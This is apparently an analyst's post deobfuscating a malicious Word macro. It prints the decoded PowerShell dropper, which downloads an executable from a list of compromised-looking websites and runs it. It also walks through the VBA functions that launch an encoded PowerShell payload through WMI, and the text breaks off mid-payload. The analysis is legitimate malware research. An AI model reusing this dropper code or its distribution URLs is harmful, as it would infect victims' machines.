bq,AnAg, bq,CkAg, bq,KwAg, bq,nACg, bq,8AJg, bq,wArg, bq,ACcg, bq,ALwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,YAag, bq,QAng, bq,ACsg, bq,AJwg, bq,BkAg, bq,GUAg, bq,bAAg, bq,nACg, bq,sAJg, bq,wBpg, bq,AHQg, bq,AeQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAZg, bq,wB1g, bq,AGkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,4AYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BvAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZwBg, bq,pACg, bq,cAKg, bq,wAng, bq,AC0g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,iAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBWg, bq,AEEg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwAg, bq,qAGg, bq,gAdg, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HAAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wA6g, bq,AC8g, bq,ALwg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,BpAg, bq,HIAg, bq,bgBg, bq,hAGg, bq,sAbg, bq,QBpg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GQAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBlg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,jAGg, bq,kAJg, bq,wArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,wACg, bq,0AJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,UAZg, bq,AAng, bq,ACsg, bq,AKAg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAcg, bq,wAvg, bq,AHEg, bq,AJwg, bq,ApAg, bq,CsAg, bq,JwBg, bq,rACg, bq,cAKg, bq,wAng, bq,ADkg, bq,Adwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAFg, bq,cAMg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,CoAg, bq,aAAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAcg, bq,wA6g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,zAHg, bq,UAYg, bq,gAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,aQBg, bq,0AGg, bq,8AYg, bq,wBhg, bq,AHIg, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,8Abg, bq,QAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,HcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wBwg, bq,AC0g, bq,AYwg, bq,BvAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,4Adg, bq,ABlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G4Ag, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AHQg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,CAHg, bq,kAZg, bq,QBPg, bq,AEEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AOQg, bq,AvAg, bq,CcAg, bq,KwAg, bq,nACg, bq,oAag, bq,AB0g, bq,AHQg, bq,AJwg, bq,ArAg, bq,CcAg, bq,cABg, bq,zADg, bq,oAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,lAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BlAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AGEg, bq,AbAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,pAGg, bq,IAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,GEAg, bq,YQAg, bq,nACg, bq,sAJg, bq,wByg, bq,AGMg, bq,AJwg, bq,ApAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,gAag, bq,QB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAYg, bq,wB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C4Ag, bq,YwBg, bq,vAGg, bq,0ALg, bq,wB3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,G8Ag, bq,cgBg, bq,kAHg, bq,AAcg, bq,gBlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wAvg, bq,AFQg, bq,ALwg, bq,AnAg, bq,CkAg, bq,KQAg, bq,uACg, bq,IAcg, bq,wBgg, bq,AFAg, bq,ATAg, bq,BJAg, bq,FQAg, bq,IgAg, bq,oAFg, bq,sAYg, bq,wBog, bq,AGEg, bq,Acgg, bq,BdAg, bq,DQAg, bq,MgAg, bq,pADg, bq,sAJg, bq,ABTg, bq,AHIg, bq,AcAg, bq,B1Ag, bq,GIAg, bq,NgAg, bq,1ADg, bq,0AKg, bq,AAog, bq,ACcg, bq,ASQg, bq,A2Ag, bq,HoAg, bq,JwAg, bq,rACg, bq,cAZg, bq,ABfg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GwAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wByg, bq,ACcg, bq,AKQg, bq,A7Ag, bq,GYAg, bq,bwBg, bq,yAGg, bq,UAYg, bq,QBjg, bq,AGgg, bq,AKAg, bq,AkAg, bq,FEAg, bq,ZQBg, bq,jAGg, bq,cAdg, bq,AA0g, bq,AHkg, bq,AIAg, bq,BpAg, bq,G4Ag, bq,IAAg, bq,kAEg, bq,MAeg, bq,ABlg, bq,AGEg, bq,Aawg, bq,ByAg, bq,HEAg, bq,KQBg, bq,7AHg, bq,QAcg, bq,gB5g, bq,AHsg, bq,AJAg, bq,BUAg, bq,HIAg, bq,NwBg, bq,5ADg, bq,AAZg, bq,QBng, bq,AC4g, bq,AIgg, bq,BEAg, bq,G8Ag, bq,YABg, bq,XAGg, bq,4AYg, bq,ABMg, bq,AE8g, bq,AQQg, bq,BEAg, bq,GYAg, bq,aQBg, bq,sAEg, bq,UAIg, bq,gAog, bq,ACQg, bq,AUQg, bq,BlAg, bq,GMAg, bq,ZwBg, bq,0ADg, bq,QAeg, bq,QAsg, bq,ACAg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,cgBg, bq,jAHg, bq,QAdg, bq,ABug, bq,AHYg, bq,APQg, bq,AoAg, bq,CgAg, bq,JwBg, bq,SAGg, bq,MAJg, bq,wArg, bq,ACcg, bq,AdQg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAdg, bq,QAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,HgAg, bq,JwAg, bq,pADg, bq,sASg, bq,QBmg, bq,ACAg, bq,AKAg, bq,AoAg, bq,C4Ag, bq,KAAg, bq,nAEg, bq,cAZg, bq,QB0g, bq,AC0g, bq,ASQg, bq,B0Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,IAAg, bq,kAEg, bq,IAbg, bq,gBwg, bq,AF8g, bq,Acwg, bq,A1Ag, bq,HYAg, bq,KQAg, bq,uACg, bq,IATg, bq,ABlg, bq,AGAg, bq,ATgg, bq,BgAg, bq,EcAg, bq,VABg, bq,IACg, bq,IAIg, bq,AAtg, bq,AGcg, bq,AZQg, bq,AgAg, bq,DMAg, bq,NwAg, bq,5ADg, bq,cANg, bq,gApg, bq,ACAg, bq,Aewg, bq,AmAg, bq,CgAg, bq,JwBg, bq,JAGg, bq,4Adg, bq,gBvg, bq,AGsg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZQAg, bq,nACg, bq,sAJg, bq,wAtg, bq,ACcg, bq,AKwg, bq,AnAg, bq,EkAg, bq,dABg, bq,lAGg, bq,0AJg, bq,wApg, bq,ACgg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,bgBg, bq,tAGg, bq,4Adg, bq,gAxg, bq,AGIg, bq,APQg, bq,AoAg, bq,CcAg, bq,RQAg, bq,xACg, bq,cAKg, bq,wAog, bq,ACcg, bq,Aegg, bq,AwAg, bq,G4Ag, bq,YwAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,YgBg, bq,yAGg, bq,UAYg, bq,QBrg, bq,ADsg, bq,AJAg, bq,BFAg, bq,HUAg, bq,bwAg, bq,4AGg, bq,8Aag, bq,ABug, bq,AD0g, bq,AKAg, bq,AnAg, bq,FcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wA3g, bq,AF8g, bq,AbAg, bq,ByAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QAYg, bq,wAng, bq,ACkg, bq,AKQg, bq,B9Ag, bq,H0Ag, bq,YwBg, bq,hAHg, bq,QAYg, bq,wBog, bq,AHsg, bq,AfQg, bq,B9Ag, bq,CQAg, bq,VQBg, bq,tADg, bq,gAMg, bq,ABmg, bq,AHYg, bq,AdAg, bq,A9Ag, bq,CgAg, bq,KAAg, bq,nAEg, bq,EAJg, bq,wArg, bq,ACcg, bq,ANgg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAeg, bq,AA3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,HYAg, bq,bAAg, bq,nACg, bq,kA
I am assuming there is some sort of character limit when looking at it in the GUI versus code. The bit that I had grabbed is only a forth of all the characters from what I could tell. Taking the above base64 string and decoding it I got the following (beautified for readability):
$Uevwzgz=((Bknt)(45p));
&(new-item) $ENV:usErprOFile\yv3Wm9g\wZN78e8\ -itemtype dIReCToRy;
[Net.ServicePointManager]::"SEC`UrI`TYP`ROtOC`ol" = ((tls12,) t(ls11, t)ls);
$Q3ywioo = ((Tii)(0bc)p);
$Efe5qz9=(W(z5d4)4e);
$Bnp_s5v=$env:userprofile(((gQWYv3)wm9g(gQW)(Wzn7)8e(8gQW))."rep`l`Ace"(([ChAr]103[ChAr]81[ChAr]87),[sTRING][ChAr]92))$Q3ywioo(.(exe));
$Xstbuxr=((Gde)(y709));
$Tr7y0eg=&(new-object) NET.WebClient;
$Cxeakrq=((http://haymetetrading.)(com/wp-include)(s/yG)EL(Kj4/*http):(//s)imoff(erbd)(24.com)(/wp-i)(nclude)s(/fsiQc)/*ht(tp://401kplansinfo)(.com)(/cgi)-b(in/KtFRk/*ht)(tp:)//(fidelity)(guide.com/)cgi-(bin/)(VA/*http://)(sirnakmidye)(ci.c)(om/)(wp-)includ(es/q)k9w(W2/*h)t(tps://sub)(itocarne).com/w(p-conten)(t/ByeOAt)(9/*https:)(//elies)(alib)(aarc)(hitect.com/wordpress/T/))."s`PLIT"([char]42);
$Srpub65=((I6zd_l)r);
foreach($Qecgt4y in $Cxeakrq){try{$Tr7y0eg."Do`Wn`LOADfilE"($Qecgt4y, $Bnp_s5v);
$Crcttnv=((Rcum)ukx);
If ((.(Get-Item) $Bnp_s5v)."Le`N`GTH" -ge 37976) {&(Invoke-Item)($Bnp_s5v);
$Cnmnv1b=(E1(z0nc9));
break;
$Euo8ohn=(W(7_lr4c))}}catch{}}$Um80fvt=((A6m)x7vl)
The following is my attempt to deobfuscate the script function by function as I walked my way through it. The only part that is not in there is the expanded base64 found above. The part not indented is the original and the one that is indented is the de-obfuscated code with the values dropped in for completeness.
Function Cbzdhgt82a6foxc53q()
On Error Resume Next
Quuseim6entz = 90
Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))
Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)
Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)
Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber
Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)
Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel
End Function
Function Cbzdhgt82a6foxc53q()
On Error Resume Next
Quuseim6entz = 90
Ay7pmbj8ld_rk9 = s (Vc0veos27yszc gets dropped sicne it is empty/null)
Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + s + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Wuueqzhfpms6gh3_p = winmgmt"+s+":win32_"+p+"rocess
Set Cfsnuq6d3vy5e = CreateObject(winmgmt"+s+":win32_"+p+"rocess)
Oxxxpk19hkgi4c7c0z = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu
Set Tn1cdl9lltyho4skel = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p
Cfsnuq6d3vy5e.Create "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9, winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p
End Function
Function Zk46e7c8d40(G7b_e54iwh7id_)
On Error Resume Next
X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)
Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)
Zk46e7c8d40 = B4ru9eb_hhowd
End Function
Function Zk46e7c8d40(G7b_e54iwh7id_)
On Error Resume Next
X8e38jclqayh83g3a6 = "g,bq,g,bq,wg,bq,ig,bq,nmg,bq,g,bq,gmg,bq,tg,bq,g,bq,"+s+"g,bq,g,bq,:g,bq,wg,bq,ing,bq,g,bq,3g,bq,2g,bq,_g,bq,"+p+"g,bq,rog,bq,g,bq,ceg,bq,sg,bq,sg,bq,"
Hy1d43_mrbnkby5l = winmgmt"+s+":win32_"+p+"rocess
B4ru9eb_hhowd = winmgmt"+s+":win32_"+p+"rocess (Sg918dyn87p9_2/Gcqeayz9i6vt1m44y1 gets dropped since null/empty)
Zk46e7c8d40 = winmgmt"+s+":win32_"+p+"rocess
End Function
Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)
On Error Resume Next
Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)
showwindow = wdKeyEquals - wdKeyEquals
End Function
Function Ngdcwyg32b4skvo5c1(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)
On Error Resume Next
Set Ngdcwyg32b4skvo5c1 = GetObject(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)
showwindow = 0
End Function
Function Qfyk87zgdp86ufle()
On Error Resume Next
Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)
End Function
Function Qfyk87zgdp86ufle()
On Error Resume Next
Puw2oumxgis = "powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9
Qfyk87zgdp86ufle = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MA